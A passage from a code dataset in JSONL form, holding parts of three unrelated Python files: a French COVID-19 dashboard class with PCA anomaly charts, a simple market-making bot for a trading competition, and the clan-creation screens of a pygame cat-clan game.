((fdata.at[self.positive_last_day, 'P'] / popfr) * 100000).round(2),\n },\n }\n\n gJ.update({'counters': counters})\n\n return gJ\n ##############################\n # positive case study ending\n ##############################\n\n def request_label(self, department=None, region=None):\n \"\"\"Get a department or a region label from its insee code\n Returns:\n Department or Region label\n \"\"\"\n if not department is None and region is None:\n if department in self.department_base_data.index:\n return {\"prefix\": \"dépt.\", \"type\": \"department\", \"name\": self.department_base_data.at[department, 'label']}\n return \"\"\n elif department is None and not region is None:\n if region in self.region_base_data.index:\n return {\"prefix\": \"région\", \"type\": \"region\", \"name\": self.region_base_data.at[region, 'label']}\n return \"\"\n return \"France\"\n\n def pca_charts(self, data, pcdim, q=0.975, normalize=False, start_d_learn='15/05/2020', end_d_learn='20/08/2020', alpha=1-0.4):\n \n results = CovidFr.pca(data, pcdim, q, normalize, start_d_learn, end_d_learn, alpha)\n\n annotations = [\n go.layout.Annotation(\n #x = max(results[\"Hotelling\"][\"dataindex\"])-(max(results[\"Hotelling\"][\"dataindex\"])-min(results[\"Hotelling\"][\"dataindex\"]))/4,\n x = results[\"Hotelling\"][\"dataindex\"][-30],\n y = 3*max(results[\"Hotelling\"][\"t2\"])/4,\n xref = \"x\",\n yref = \"y\",\n text = 'rpc: {} pc (ev: {}%)
normalized data: {}
model building: {}
to {}
smoothing filter: {}'.format(pcdim, ((np.trace(np.diag(results[\"eigenvalues\"][:pcdim]))/np.trace(np.diag(results[\"eigenvalues\"])))*100).round(2), normalize, start_d_learn, end_d_learn, alpha),\n showarrow = False,\n font = dict(\n family = \"Courier New, monospace\",\n size = 10,\n color = \"#ffffff\",\n ),\n align = \"left\",\n arrowhead = 2,\n arrowsize = 1,\n arrowwidth = 2,\n arrowcolor = \"#636363\",\n ax = 20,\n ay = 30,\n bordercolor = \"#c7c7c7\",\n borderwidth = 2,\n borderpad = 4,\n bgcolor = '#000080',\n opacity = 0.3,\n )\n ]\n\n graphs = [\n dict(\n id = 'Hotelling',\n data=[\n CovidFr.dataviz(x=results[\"Hotelling\"][\"dataindex\"], y=results[\"Hotelling\"][\"t2\"], curve_type='line', color='#02056D', name='score t', width=3, text=['situation anormale' if results[\"Hotelling\"][\"t2\"][i]>results[\"Hotelling\"][\"threshold\"] else 'situation normale' for i in range(len(results[\"Hotelling\"][\"dataindex\"]))], hovertemplate='%{text}'),\n\n CovidFr.dataviz(x=results[\"Hotelling\"][\"dataindex\"], y=results[\"Hotelling\"][\"smoothed_t2\"], curve_type='line', color='#026D2F', name='score t filtré', width=3, text=['situation anormale' if results[\"Hotelling\"][\"smoothed_t2\"][i]>results[\"Hotelling\"][\"threshold\"] else 'situation normale' for i in range(len(results[\"Hotelling\"][\"dataindex\"]))], hovertemplate='%{text}'),\n\n CovidFr.dataviz(x=results[\"Hotelling\"][\"dataindex\"], y=np.repeat(results[\"Hotelling\"][\"threshold\"], results[\"Hotelling\"][\"t2\"].shape[0]), curve_type='line', color='#ff0000', name='seuil', width=3, text=['seuil' for i in range(len(results[\"Hotelling\"][\"dataindex\"]))], hovertemplate='%{text}', showlegend = False),\n ],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=30, b=30, t=30), linemode='overlay', legend=dict(orientation=\"h\"), annotations=annotations),\n ),\n\n dict(\n id = 'SPE',\n data=[\n CovidFr.dataviz(x=results[\"SPE\"][\"dataindex\"], y=results[\"SPE\"][\"spe\"], curve_type='line', color='#02056D', name='score s', width=3, text=['situation anormale' if results[\"SPE\"][\"spe\"][i]>results[\"SPE\"][\"threshold\"] else 'situation normale' for i in range(len(results[\"SPE\"][\"dataindex\"]))], hovertemplate='%{text}'),\n\n CovidFr.dataviz(x=results[\"SPE\"][\"dataindex\"], y=results[\"SPE\"][\"smoothed_spe\"], curve_type='line', color='#026D2F', name='score s filtré', width=3, text=['situation anormale' if results[\"SPE\"][\"smoothed_spe\"][i]>results[\"SPE\"][\"threshold\"] else 'situation normale' for i in range(len(results[\"SPE\"][\"dataindex\"]))], hovertemplate='%{text}'),\n\n CovidFr.dataviz(x=results[\"SPE\"][\"dataindex\"], y=np.repeat(results[\"SPE\"][\"threshold\"], results[\"SPE\"][\"spe\"].shape[0]), curve_type='line', color='#ff0000', name='seuil', width=3, text=['seuil' for i in range(len(results[\"SPE\"][\"dataindex\"]))], hovertemplate='%{text}', showlegend = False),\n ],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=30, b=30, t=30), linemode='overlay', legend=dict(orientation=\"h\")),\n ),\n ]\n\n graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)\n\n return {'graphJSON': graphJSON,\n 'retained PCs': pcdim,\n 'normalized': normalize,\n 'explained variance': ((np.trace(np.diag(results[\"eigenvalues\"][:pcdim]))/np.trace(np.diag(results[\"eigenvalues\"])))*100).round(2),\n 'SPE': {'spe': results[\"SPE\"][\"spe\"],\n 'smoothed_spe': results[\"SPE\"][\"smoothed_spe\"],\n 'threshold': results[\"SPE\"][\"threshold\"],\n },\n 'Hotelling': {'t2': results[\"Hotelling\"][\"t2\"], \n 'smoothed_t2': results[\"Hotelling\"][\"smoothed_t2\"], \n 'threshold': results[\"Hotelling\"][\"threshold\"],\n },\n }\n\n @staticmethod\n def normrate(ddn, cdu, featurelist):\n dep_data_norm_col = {}\n for col in featurelist:\n data = []\n for dep in cdu:\n data.append(ddn[dep][col])\n dep_data_norm_col.update({col: pd.concat(data, axis=1, keys=cdu)})\n return dep_data_norm_col\n\n @staticmethod\n def regionadd(data):\n regions = {\n \"01\": {\"Guadeloupe\": ['971']},\n \"02\": {\"Martinique\": ['972']},\n \"03\": {\"Guyane\": ['973']},\n \"04\": {\"La Réunion\": ['974']},\n \"06\": {\"Mayotte\": ['976']},\n \"11\": {\"Île-de-France\": ['92', '93', '94', '78', '75', '77', '91', '95']},\n \"24\": {\"Centre-Val de Loire\": ['41', '28', '45', '18', '37', '36']},\n \"27\": {\"Bourgogne-Franche-Comté\": ['71', '58', '25', '70', '90', '39', '89', '21']},\n \"28\": {\"Normandie\": ['76', '61', '50', '14', '27']},\n \"32\": {\"Hauts-de-France\": ['60', '59', '02', '62', '80']},\n \"44\": {\"Grand Est\": ['54', '68', '51', '55', '08', '57', '67', '52', '88', '10']},\n \"52\": {\"Pays de la Loire\": ['49', '85', '44', '72', '53']},\n \"53\": {\"Bretagne\": ['29', '56', '35', '22']},\n \"75\": {\"Nouvelle-Aquitaine\": ['24', '17', '33', '64', '16', '40', '19', '79', '87', '86', '47', '23']},\n \"76\": {\"Occitanie\": ['34', '48', '46', '82', '11', '12', '32', '09', '81', '65', '30', '66', '31']}, \n \"84\": {\"Auvergne-Rhône-Alpes\": ['38', '01', '42', '74', '73', '43', '03', '26', '69', '07', '63', '15']},\n \"93\": {\"Provence-Alpes-Côte d'Azur\": ['13', '05', '06', '84', '04', '83']},\n \"94\": {\"Corse\": ['2B', '2A']},\n }\n for key, value in regions.items():\n for k, v in value.items():\n data.loc[data.loc[data['dep'].isin(v)].index, 'reg'] = key\n data = data[[\"reg\", \"dep\", \"sexe\", \"jour\", \"hosp\", \"rea\", \"rad\", \"dc\"]]\n return data\n \n @staticmethod\n def dailycases(data=None, pca=False):\n cdata = data[data.sexe == 0].groupby(['jour']).sum().copy()\n cdata = cdata[['hosp', 'rea', 'rad', 'dc']]\n\n cdata.index = pd.to_datetime(cdata.index)\n\n dc_j = []\n rad_j = []\n dc_rectif = []\n rad_rectif = []\n for i in range(len(cdata.index)):\n dc_rectif.append(max(cdata.dc[0:i+1]))\n rad_rectif.append(max(cdata.rad[0:i+1]))\n if i == 0:\n dc_j.append(cdata.dc[i])\n rad_j.append(cdata.rad[i]) \n else: \n dc_j.append(max(cdata.dc[0:i+1]) - max(cdata.dc[0:i]))\n rad_j.append(max(cdata.rad[0:i+1]) - max(cdata.rad[0:i]))\n\n cdata[\"rad_rectif\"] = rad_rectif\n cdata[\"dc_rectif\"] = dc_rectif\n cdata[\"rad_j\"] = rad_j\n cdata[\"dc_j\"] = dc_j\n\n if pca is True:\n cdata = cdata[['hosp', 'rea', 'rad_j', 'dc_j']]\n cdata = cdata.rename(columns={'rad_j':'rad', 'dc_j':'dc'})\n return cdata\n return cdata\n\n @staticmethod\n def ewma_filter(data, alpha, offset=None, dtype=None, order='C', out=None):\n \"\"\"\n Calculates the exponential moving average over a vector.\n Will fail for large inputs.\n \"\"\"\n data = np.array(data, copy=False)\n\n if dtype is None:\n if data.dtype == np.float32:\n dtype = np.float32\n else:\n dtype = np.float64\n else:\n dtype = np.dtype(dtype)\n\n if data.ndim > 1:\n # flatten input\n data = data.reshape(-1, order)\n\n if out is None:\n out = np.empty_like(data, dtype=dtype)\n else:\n assert out.shape == data.shape\n assert out.dtype == dtype\n\n if data.size < 1:\n # empty input, return empty array\n return out\n\n if offset is None:\n offset = data[0]\n\n alpha = np.array(alpha, copy=False).astype(dtype, copy=False)\n # scaling_factors -> 0 as len(data) gets large\n # this leads to divide-by-zeros below\n scaling_factors = np.power(1. - alpha, np.arange(data.size + 1, dtype=dtype),\n dtype=dtype)\n # create cumulative sum array\n np.multiply(data, (alpha * scaling_factors[-2]) / scaling_factors[:-1],\n dtype=dtype, out=out)\n np.cumsum(out, dtype=dtype, out=out)\n # cumsums / scaling\n out /= scaling_factors[-2::-1]\n if offset != 0:\n offset = np.array(offset, copy=False).astype(dtype, copy=False)\n # add offsets\n out += offset * scaling_factors[1:]\n return out\n\n @staticmethod\n def pca(data, pcdim, q, normalize, start_d_learn, end_d_learn, alpha):\n \"\"\"\n Get PCA on data\n \"\"\"\n dataindex = data.index\n #learn_data = data[(data.index>=start_d_learn) & (data.index<=end_d_learn)].copy()\n learn_data = data[(data.index>=datetime.strptime(start_d_learn, '%d/%m/%Y').strftime(\"%Y-%m-%d\")) & (data.index<=datetime.strptime(end_d_learn, '%d/%m/%Y').strftime(\"%Y-%m-%d\"))].copy()\n if normalize is True:\n std = StandardScaler().fit(learn_data)\n learn_data = std.transform(learn_data)\n data = std.transform(data)\n \n u, s, vh = np.linalg.svd(np.dot(np.transpose(learn_data), learn_data)/(learn_data.shape[0]), full_matrices=True)\n \n u_tilde = u[:, pcdim:]\n c_tilde = np.dot(u_tilde, np.transpose(u_tilde))\n spe = np.diag(np.dot(np.dot(data, c_tilde), np.transpose(data)))\n \n numgspe = np.trace(np.square(np.diag(s[pcdim:])))\n dengspe = np.trace(np.diag(s[pcdim:]))\n gspe = numgspe/dengspe\n\n numhspe = np.square(dengspe)\n denhspe = numgspe\n hspe = numhspe/denhspe\n\n u_hat = u[:, :pcdim]\n c_hat_Hotelling =np.dot(np.dot(u_hat, inv(np.diag(s[:pcdim]))), np.transpose(u_hat)) \n t2 = np.diag(np.dot(np.dot(data, c_hat_Hotelling), np.transpose(data)))\n\n return {\"SPE\": {\n \"dataindex\": dataindex,\n \"spe\": spe,\n \"smoothed_spe\": CovidFr.ewma_filter(data=spe, alpha=alpha),\n \"threshold\": gspe*chi2.ppf(q, df=hspe),\n },\n \"Hotelling\": {\n \"dataindex\": dataindex,\n \"t2\": t2,\n \"smoothed_t2\": CovidFr.ewma_filter(data=t2, alpha=alpha),\n \"threshold\": chi2.ppf(q, df=pcdim),\n },\n \"eigenvalues\": s,\n }\n\n @staticmethod\n def regiondailycases(data, feature):\n if feature in [\"dc\", \"rad\"]: \n dr = {}\n for r in data.reg.unique():\n regdep = []\n for d in data[data.reg==r].dep.unique():\n regdep.append(CovidFr.dailycases(data=data[(data.dep == d) & (data.sexe == 0)].groupby(['jour']).sum(), pca=True))\n cdata = reduce(lambda x, y: x.add(y, fill_value=0), regdep)\n dr.update({\"reg-\"+r: cdata[feature]})\n return pd.DataFrame.from_dict(dr)\n elif feature in [\"hosp\", \"rea\"]:\n data_reg = pd.DataFrame()\n for r in data.reg.unique():\n data_reg['reg-{}'.format(r)] = data[(data.sexe == 0) & (data.reg == r)].groupby(\"jour\").sum()[feature]\n return data_reg\n \n @staticmethod\n def topdepdataviz(data, **kwargs):\n top = kwargs.get('top', False)\n top_number = kwargs.get('top_number', None)\n threshold = kwargs.get('threshold', None)\n\n if top:\n df = data.sort_values(by=data.index.max(), axis=1, ascending=False)\n select_dep_data_norm_col = df[df.columns[:top_number]]\n else:\n select_dep_data_norm_col = data[data.columns[[item for elem in (data[-1:] > threshold).values.tolist() for item in elem]]]\n\n return select_dep_data_norm_col\n \n @staticmethod\n def dataviz(x, y, curve_type, **kwargs):\n name = kwargs.get('name', None)\n color = kwargs.get('color', None)\n width = kwargs.get('width', None)\n opacity = kwargs.get('opacity', None)\n hovertemplate = kwargs.get('hovertemplate', None)\n text = kwargs.get('text', None)\n showlegend = kwargs.get('showlegend', None)\n\n output = dict(\n x = x,\n y = y,\n type = curve_type,\n name = name,\n marker = dict(\n color = color,\n line = dict(\n color = color, \n width = width,\n ),\n opacity = opacity,\n ),\n hovertemplate = hovertemplate,\n text = text,\n showlegend = showlegend,\n )\n return output\n\n @staticmethod\n def layoutoption(**kwargs):\n title = kwargs.get('title', None)\n barmode = kwargs.get('barmode', None)\n linemode = kwargs.get('linemode', None)\n legend_orientation = kwargs.get('legend_orientation', None)\n legend = kwargs.get('legend', None)\n margin = kwargs.get('margin', None)\n annotations = kwargs.get('annotations', None)\n\n output = dict(\n title = title,\n barmode = barmode,\n linemode = linemode,\n legend_orientation = legend_orientation,\n legend = legend,\n margin = margin,\n annotations = annotations,\n )\n return output \n\n @staticmethod\n def updatechecking(json_url, data_request_url):\n with urllib.request.urlopen(json_url) as url:\n data = json.loads(url.read().decode())\n #data = json.loads(data)\n for dataset in data['@graph']:\n if 'accessURL' in dataset.keys() and dataset['accessURL'] == data_request_url:\n return dataset['modified']","repo_name":"mnassrib/covid-fr-dashboard","sub_path":"cutils/covidclass.py","file_name":"covidclass.py","file_ext":"py","file_size_in_byte":57240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70663612267","text":"from utc_bot import UTCBot, start_bot\nimport proto.utc_bot as pb\nimport betterproto\nimport sys\nimport asyncio\nfrom case1_bot import Case1Bot\n\nCONTRACTS = [\"LBSJ\",\"LBSM\", \"LBSQ\", \"LBSV\", \"LBSZ\"]\nORDER_SIZE = 20\nSPREAD = 2\n\nEXPIRY_PRICE = { #2016-2021\n \"LBSJ\": [221.23,210.73,185.91,220.15,219.58,213.2],\n \"LBSM\": [207.55,209.6,280.91,281.31,255.24,208.49],\n \"LBSQ\": [246.63,276.45,260.07,227.84,242.59,258.71],\n \"LBSV\": [262.2,296.24,244.98,228.33,242.1,270.32],\n \"LBSZ\": [282.58,260.49,265.63,280.89,311.71,330.02]\n}\n\n\nclass MMBoT(Case1Bot):\n\n def set_year(self):\n self.year = year # for pnl\n def update_fairs(self):\n # updates fairs, also sets the state to offset positions\n for month in CONTRACTS:\n self.fairs[month] = 300\n\n\n\n def get_spread(self):\n \n our_spread = {}\n for month in CONTRACTS:\n fair = self.fairs[month]\n \n (lo, hi) = self.spread[month]\n if self.pos[month] >= 5:\n if self.state[month] != \"sell\":\n hi = lo + (hi-lo)*(1/4) # moving to sell state\n else:\n hi -= 1\n bid_size, ask_size = 1, self.pos[month]+1\n self.state[month] = \"sell\" # want to sell off\n \n elif self.pos[month] <= -5:\n if self.state[month] != \"buy\":\n lo = hi - (hi-lo) * (3/4)\n else:\n lo += 1\n bid_size, ask_size = abs(self.pos[month])+1, 1\n self.state[month] = \"buy\"\n else:\n self.state[month] = \"normal\"\n lo, hi = fair - 40, fair + 40\n\n bid_size, ask_size = 10, 10\n \n self.spread[month] = (lo, hi)\n \n our_spread[month] = [lo, hi, bid_size, ask_size]\n\n return our_spread\n\n\nif __name__ == \"__main__\":\n year = sys.argv[1]\n print(year)\n start_bot(MMBoT)","repo_name":"bg459/utc","sub_path":"utc_xchange_v1.1/case1/mm_bot_v1.py","file_name":"mm_bot_v1.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40567923095","text":"import pygame\nfrom random import choice, randrange\n\nfrom .base_screens import Screens\n\nfrom scripts.game_structure.text import *\nfrom scripts.game_structure.buttons import buttons\nfrom scripts.utility import draw, draw_big, draw_large\nfrom scripts.clan import Clan, map_available\nfrom scripts.cat.cats import create_example_cats\nfrom scripts.cat.names import names\nfrom scripts.cat.sprites import tiles\nimport scripts.game_structure.image_cache as image_cache\n#from scripts.world import World, save_map\nmap_available = False\n\ndef roll_button(self, x_value, y_value, arg0):\n buttons.draw_image_button((x_value, y_value),\n button_name='random_dice',\n re_roll=True,\n size=(34, 34),\n available=arg0)\ndef draw_main_menu(self):\n verdana_small.text(\n 'Note: going back to main menu resets the generated cats.',\n (25, 25))\n buttons.draw_image_button((25, 50),\n button_name='main_menu',\n text='<< Back to Main Menu',\n cur_screen='start screen',\n naming_text='',\n set_game_mode=False,\n size=(153, 30)\n )\n\n\nclass MakeClanScreen(Screens):\n\n # UI images\n clan_frame_img = pygame.image.load(\n 'resources/images/pick_clan_screen/clan_name_frame.png').convert_alpha()\n name_clan_img = pygame.image.load(\n 'resources/images/pick_clan_screen/name_clan_light.png').convert_alpha()\n leader_img = pygame.image.load(\n 'resources/images/pick_clan_screen/leader_light.png').convert_alpha()\n deputy_img = pygame.image.load(\n 'resources/images/pick_clan_screen/deputy_light.png').convert_alpha()\n medic_img = pygame.image.load(\n 'resources/images/pick_clan_screen/med_light.png').convert_alpha()\n clan_img = pygame.image.load(\n 'resources/images/pick_clan_screen/clan_light.png').convert_alpha()\n bg_preview_border = pygame.transform.scale(\n pygame.image.load(\"resources/images/bg_preview_border.png\").convert_alpha(), (466, 416))\n def draw_clan_name(self):\n # draw name and frame\n screen.blit(MakeClanScreen.clan_frame_img, (292, 100))\n verdana_light.text(game.switches['clan_name'] + 'Clan', ('center', 115))\n\n def game_mode(self):\n # ---------------------------------------------------------------------------- #\n # layout #\n # ---------------------------------------------------------------------------- #\n draw_main_menu(self)\n text_box = image_cache.load_image(\n 'resources/images/game_mode_text_box.png').convert_alpha()\n screen.blit(text_box, (325, 130))\n\n y_value = 240\n\n # ---------------------------------------------------------------------------- #\n # mode selection #\n # ---------------------------------------------------------------------------- #\n if game.switches['game_mode'] is None:\n game.switches['game_mode'] = 'classic'\n\n buttons.draw_image_button((109, y_value),\n button_name='classic_mode',\n size=(132, 30),\n game_mode='classic',\n )\n y_value += 80\n buttons.draw_image_button((94, y_value),\n button_name='expanded_mode',\n size=(162, 34),\n game_mode='expanded',\n )\n y_value += 80\n buttons.draw_image_button((100, y_value),\n button_name='cruel_season',\n size=(150, 30),\n game_mode='cruel season',\n )\n\n # ---------------------------------------------------------------------------- #\n # classic text #\n # ---------------------------------------------------------------------------- #\n if game.switches['game_mode'] == 'classic':\n y_value = 136\n x_value = 345\n verdana_big_light.text(\"Classic Mode\", (465, y_value))\n y_value += 50\n\n verdana_dark.blit_text(\"Sit back and relax. \\n\"\n \"This mode is Clan Generator at it's most basic. The player is not expected to \"\n \"manage the minutia of clan life. Perfect for a relaxing game session or for \"\n \"focusing on storytelling. \\nWith this mode you are the eye in the sky, \"\n \"watching the clan as their story unfolds.\",\n (x_value, y_value),\n line_break=40,\n x_limit=700\n )\n\n # ---------------------------------------------------------------------------- #\n # expanded text #\n # ---------------------------------------------------------------------------- #\n if game.switches['game_mode'] == 'expanded':\n y_value = 136\n x_value = 345\n\n verdana_big_light.text(\"Expanded Mode\", (453, y_value))\n y_value += 50\n\n verdana_dark.blit_text(\"A more hands-on experience. \\nThis mode has everything in Classic Mode as well as \"\n \"more management focused features. \\nNew features include: \\n\"\n \"----no new features as of yet---- \\nWith this mode you'll be making the important \"\n \"clan-life decisions.\",\n (x_value, y_value),\n line_break=40,\n x_limit=700)\n\n # ---------------------------------------------------------------------------- #\n # cruel season text #\n # ---------------------------------------------------------------------------- #\n if game.switches['game_mode'] == 'cruel season':\n y_value = 136\n x_value = 345\n\n verdana_big_light.text(\"Cruel Season\", (464, y_value))\n y_value += 50\n\n verdana_dark.blit_text(\"This mode has all the features of Expanded mode, but is significantly \"\n \"more difficult. If you'd like a challenge, then this mode is for you. \\n \\n\"\n \"---this mode is currently unavailable--- \\n \\nYou heard the warnings... \"\n \"a Cruel Season is coming. \\nWill you survive?\",\n (x_value, y_value),\n line_break=40,\n x_limit=700)\n\n buttons.draw_image_button((253, 620),\n button_name='last_step',\n text='< Last step',\n hotkey=[0],\n size=(147, 30),\n available=False\n )\n\n # ---------------------------------------------------------------------------- #\n # next and prev step #\n # ---------------------------------------------------------------------------- #\n if game.switches['game_mode'] != 'cruel season':\n buttons.draw_image_button((400, 620),\n button_name='next_step',\n text='Next Step',\n set_game_mode=True,\n available=True,\n size=(147, 30)\n )\n else:\n buttons.draw_image_button((400, 620),\n button_name='next_step',\n text='Next Step',\n set_game_mode=True,\n available=False,\n size=(147, 30)\n )\n\n verdana.text(\"Your clan's game mode is permanent and cannot be changed after clan creation.\", ('center', 581))\n\n\n def first_phase(self):\n # layout\n draw_main_menu(self)\n\n screen.blit(MakeClanScreen.name_clan_img, (0, 0))\n\n # color and placement of user input text\n self.game_screen.blit(game.naming_box, (265, 600))\n verdana_dark.text(game.switches['naming_text'], (265, 600))\n\n # choose random prefix\n verdana_light.text('-Clan', (410, 600))\n\n buttons.draw_image_button((222, 593),\n button_name='random_dice',\n text='Randomize',\n naming_text=choice(names.normal_prefixes),\n size=(34, 34),\n hotkey=[1]\n )\n # reset clan name\n buttons.draw_image_button((455, 595),\n button_name='reset_name',\n text='Reset Name',\n naming_text='',\n size=(134, 30),\n hotkey=[2]\n )\n\n # ---------------------------------------------------------------------------- #\n # next and prev step #\n # ---------------------------------------------------------------------------- #\n buttons.draw_image_button((253, 635),\n button_name='last_step',\n text='< Last step',\n set_game_mode=False,\n hotkey=[0],\n size=(147, 30)\n )\n\n if game.switches['naming_text'] != '':\n buttons.draw_image_button((400, 635),\n button_name='next_step',\n text='Next Step',\n clan_name=game.switches['naming_text'],\n available=True,\n size=(147, 30)\n )\n else:\n buttons.draw_image_button((400, 635),\n button_name='next_step',\n text='Next Step',\n clan_name=game.switches['naming_text'],\n available=False,\n size=(147, 30)\n )\n\n def second_phase(self):\n game.switches['naming_text'] = ''\n\n self.draw_clan_name()\n\n draw_main_menu(self)\n\n screen.blit(MakeClanScreen.leader_img, (0, 414))\n\n if len(game.switches['clan_list']) >= 3:\n roll_button(self, 83, 440, True)\n\n else:\n if game.switches['roll_count'] == 0:\n x_pos = 155\n y_pos = 235\n roll_button(self, x_pos, y_pos, True)\n y_pos += 40\n roll_button(self, x_pos, y_pos, True)\n y_pos += 40\n roll_button(self, x_pos, y_pos, True)\n y_pos += 40\n\n if game.switches['roll_count'] == 1:\n x_pos = 155\n y_pos = 235\n roll_button(self, x_pos, y_pos, True)\n y_pos += 40\n roll_button(self, x_pos, y_pos, True)\n y_pos += 40\n roll_button(self, x_pos, y_pos, False)\n y_pos += 40\n\n if game.switches['roll_count'] == 2:\n x_pos = 155\n y_pos = 235\n roll_button(self, x_pos, y_pos, True)\n y_pos += 40\n roll_button(self, x_pos, y_pos, False)\n y_pos += 40\n roll_button(self, x_pos, y_pos, False)\n y_pos += 40\n\n if game.switches['roll_count'] == 3:\n x_pos = 155\n y_pos = 235\n roll_button(self, x_pos, y_pos, False)\n y_pos += 40\n roll_button(self, x_pos, y_pos, False)\n y_pos += 40\n roll_button(self, x_pos, y_pos, False)\n y_pos += 40\n\n if game.switches['re_roll'] is True:\n create_example_cats()\n game.switches['roll_count'] += 1\n game.switches['re_roll'] = False\n\n # draw cats to choose from\n for u in range(6):\n buttons.draw_button((50, 130 + 50 * u),\n image=game.choose_cats[u].sprite,\n cat=u,\n hotkey=[1, u + 10])\n for u in range(6, 12):\n buttons.draw_button((100, 130 + 50 * (u - 6)),\n image=game.choose_cats[u].sprite,\n cat=u,\n hotkey=[2, u + 4])\n\n # draw clicked cat\n if game.switches['cat'] is not None and 12 > game.switches['cat'] >= 0:\n chosen_cat = game.choose_cats[game.switches['cat']]\n draw_large(chosen_cat, (270, 200))\n if game.choose_cats[game.switches['cat']].age in [\n 'kitten', 'adolescent'\n ]:\n verdana.text(str(game.choose_cats[game.switches['cat']].name),\n ('center', 175))\n else:\n verdana.text(\n str(game.choose_cats[game.switches['cat']].name) +\n ' --> ' +\n game.choose_cats[game.switches['cat']].name.prefix +\n 'star', ('center', 175))\n verdana_small.text(\n str(game.choose_cats[game.switches['cat']].gender), (440, 260))\n verdana_small.text(str(game.choose_cats[game.switches['cat']].age),\n (440, 275))\n verdana_small.text(\n str(game.choose_cats[game.switches['cat']].trait), (440, 290))\n if game.choose_cats[game.switches['cat']].age in [\n 'kitten', 'adolescent'\n ]:\n verdana_red.text('Too young to become leader.', ('center', 360))\n else:\n buttons.draw_image_button((234, 348),\n button_name='grant_lives',\n text='Grant this cat their nine lives',\n leader=game.switches['cat'],\n size=(332, 52),\n hotkey=[1]\n )\n\n # ---------------------------------------------------------------------------- #\n # next and prev step #\n # ---------------------------------------------------------------------------- #\n buttons.draw_image_button((253, 400),\n button_name='last_step',\n text='< Last step',\n clan_name='',\n cat=None,\n hotkey=[0],\n size=(147, 30)\n )\n\n buttons.draw_image_button((400, 400),\n button_name='next_step',\n text='Next Step',\n clan_name='',\n available=False,\n size=(147, 30)\n )\n\n def third_phase(self):\n self.draw_clan_name()\n draw_main_menu(self)\n\n screen.blit(MakeClanScreen.deputy_img, (0, 414))\n\n for u in range(6):\n if game.switches['leader'] == u:\n draw(game.choose_cats[u],(650, 200))\n else:\n buttons.draw_button((50, 130 + 50 * u),\n image=game.choose_cats[u].sprite,\n cat=u,\n hotkey=[1, u + 10])\n for u in range(6, 12):\n if game.switches['leader'] == u:\n draw(game.choose_cats[u],(650, 200))\n else:\n buttons.draw_button((100, 130 + 50 * (u - 6)),\n image=game.choose_cats[u].sprite,\n cat=u,\n hotkey=[2, u + 4])\n\n if game.switches['cat'] is not None and 12 > game.switches[\n 'cat'] >= 0 and game.switches['cat'] != game.switches['leader']:\n chosen_cat = game.choose_cats[game.switches['cat']]\n draw_large(chosen_cat,(270, 200))\n verdana.text(str(game.choose_cats[game.switches['cat']].name),\n ('center', 175))\n verdana_small.text(\n str(game.choose_cats[game.switches['cat']].gender), (440, 260))\n verdana_small.text(str(game.choose_cats[game.switches['cat']].age),\n (440, 275))\n verdana_small.text(\n str(game.choose_cats[game.switches['cat']].trait), (440, 290))\n if game.choose_cats[game.switches['cat']].age in [\n 'kitten', 'adolescent'\n ]:\n verdana_red.text('Too young to become deputy.', ('center', 360))\n else:\n buttons.draw_image_button((209, 348),\n button_name='support_leader',\n text='This cat will support the leader',\n deputy=game.switches['cat'],\n size=(384, 52),\n hotkey=[1])\n # ---------------------------------------------------------------------------- #\n # next and prev step #\n # ---------------------------------------------------------------------------- #\n buttons.draw_image_button((253, 400),\n button_name='last_step',\n text='< Last step',\n leader=None,\n cat=None,\n hotkey=[0],\n size=(147, 30)\n )\n buttons.draw_image_button((400, 400),\n button_name='next_step',\n text='Next Step',\n clan_name='',\n available=False,\n size=(147, 30)\n )\n\n def fourth_phase(self):\n self.draw_clan_name()\n draw_main_menu(self)\n\n screen.blit(MakeClanScreen.medic_img, (0, 414))\n\n for u in range(6):\n if game.switches['leader'] == u:\n draw(game.choose_cats[u],(650, 200))\n elif game.switches['deputy'] == u:\n draw(game.choose_cats[u],(650, 250))\n else:\n buttons.draw_button((50, 130 + 50 * u),\n image=game.choose_cats[u].sprite,\n cat=u,\n hotkey=[1, u + 10])\n\n for u in range(6, 12):\n if game.switches['leader'] == u:\n draw(game.choose_cats[u],(650, 200))\n elif game.switches['deputy'] == u:\n draw(game.choose_cats[u],(650, 250))\n else:\n buttons.draw_button((100, 130 + 50 * (u - 6)),\n image=game.choose_cats[u].sprite,\n cat=u,\n hotkey=[2, u + 4])\n\n if game.switches['cat'] is not None and 12 > game.switches[\n 'cat'] >= 0 and game.switches['cat'] != game.switches[\n 'leader'] and game.switches['cat'] != game.switches[\n 'deputy']:\n chosen_cat = game.choose_cats[game.switches['cat']]\n draw_large(chosen_cat,(270, 200))\n verdana.text(str(chosen_cat.name),\n ('center', 175))\n verdana_small.text(\n str(chosen_cat.gender), (440, 260))\n verdana_small.text(str(chosen_cat.age),\n (440, 275))\n verdana_small.text(\n str(chosen_cat.trait), (440, 290))\n if chosen_cat.age in [\n 'kitten', 'adolescent'\n ]:\n verdana_red.text('Too young to become medicine cat.',\n ('center', 360))\n else:\n buttons.draw_image_button((252, 342),\n button_name='aid_clan',\n text='This cat will aid the clan',\n medicine_cat=game.switches['cat'],\n hotkey=[1],\n size=(306, 58))\n\n # ---------------------------------------------------------------------------- #\n # next and prev step #\n # ---------------------------------------------------------------------------- #\n buttons.draw_image_button((253, 400),\n button_name='last_step',\n text='< Last step',\n deputy=None,\n cat=None,\n hotkey=[0],\n size=(147, 30)\n )\n buttons.draw_image_button((400, 400),\n button_name='next_step',\n text='Next Step',\n clan_name='',\n available=False,\n size=(147, 30)\n )\n\n def fifth_phase(self):\n self.draw_clan_name()\n draw_main_menu(self)\n\n screen.blit(MakeClanScreen.clan_img, (0, 414))\n\n for u in range(6):\n if game.switches['leader'] == u:\n draw(game.choose_cats[u],(650, 200))\n elif game.switches['deputy'] == u:\n draw(game.choose_cats[u],(650, 250))\n elif game.switches['medicine_cat'] == u:\n draw(game.choose_cats[u],(650, 300))\n elif u not in game.switches['members']:\n buttons.draw_button((50, 130 + 50 * u),\n image=game.choose_cats[u].sprite,\n cat=u,\n hotkey=[1, u + 10])\n try:\n if u == game.switches['members'][0]:\n draw(game.choose_cats[u],(700, 100))\n elif u == game.switches['members'][1]:\n 